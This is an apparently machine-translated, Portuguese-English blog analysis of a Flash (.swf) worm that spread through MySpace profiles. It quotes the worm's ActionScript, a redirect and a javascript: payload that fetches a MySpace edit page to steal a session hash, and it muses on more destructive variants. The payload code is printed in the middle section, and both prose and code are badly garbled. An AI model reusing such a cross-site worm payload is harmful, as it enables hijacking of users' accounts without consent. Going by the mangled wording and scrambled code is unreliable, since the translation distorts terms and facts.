MySpace tem sido infecto by Fagulha fundamentado (swf) bicho qual espalhando rapidamente atrav�s MySpace. incorporado JavaScript c�digo em usu�rios perfis que redirecionar visitantes a um s�tio pretendente o U.S. governamental foi atrasado o 9/11 terrorista ataque, Symantec avisou segunda-feira Agora pode ser justamente a ponta do icebergue. Let's presa uma olhada at como funciona comprender como pode ser facilmente modificado entregar muita devastador payloads.

O unnamed bicho n�o � malicioso mas o Shockwave Fagulha (.swf) arquivo contendo o payload incorporar JavaScript na perfil de qualquer MySpace usu�rio quem vistas o .swf arquivo. Essa lata facilmente duplicarSamy meu amigo bicho sem partindo um suor.

This javascript c�digo would ent�o ser interpretar by qualquer usu�rio quem visitado o posto, permissor sensitivo dado aquela compress�o furtado, tal um picado valor necess�rio para cumprir opera��es como um usu�rio, e praticante opera��es a favor de que usu�rios ( sem assentimento obviamente). No momento, que acedem est� a ser usado somente espalhar o JavaScript c�digo a outro perfis ao popular social rede s�tio.

Se o payload malicioso, pode cumprir secundariamente ataque como destino recentemente descoberto vulnerabilidade afetando Microsc�pio Escrit�rio contente. O impacto would ser muito mais alto exposi��o j� sensitivo informa��o na sua dif�cil- disco.

Let's presa uma olhada �s bicho, devido a pesquisa by kinematic.theory:

Quando-se visitado um j� infecto p�gina, h� um Fagulha objeto incorporado ("redirect.swf") que cont�m o actionscript:
getURL("url");

A abre e redirecionar voc� pedir o especificado blog URL.

Nesta blog url tem outro rel�mpago arquivo incorporado "retrievecookie.swf". A cont�m:

getURL("javas\n\rcript: var x = nova ActiveXObject'Msxml2.XMLHTTP'x.open'GET','http(\\);(\\\:/editprofile.myspace.com/index.cfm?/fuseactionuser.HomeCommentsfriendID93634373',truex.onreadystatechangefunctionif=&=\);=(){ (x.readyState4var==){ pgx.responseTextvar=; scpg.substringpg.indexOf'BX=((\-\'3,pg.indexOf')+(\-EX'whilesc.indexOf'\));(((\
\')!=-1)||(sc.indexOf(\'-XXX\')!=-1var)){ nsc.indexOf'=(\
\'ifn);(==-1nsc.indexOf')=(\-XXX'scsc.substring0,nsc.substringn5,sc.length\);=()+(+);};" + " avaliar();}};" + "x.sendnull();", "");

A abre another blog poste(liga��o) e avaliar dela conte�dos.

Esse c�digo gets seu MySpace picado que permite qualquer um agir como you em MySpace e cometer qualquer opera��es na sua favor como alterar seu senha ou adicionando algu�m desconhecido como seu amiga, qualquer coisa voc� pode fazer em MySpace. No momento o c�digo adds uma mensagem ao seu MySpace perfil. A extensivamente uso AJAX for dela opera��es.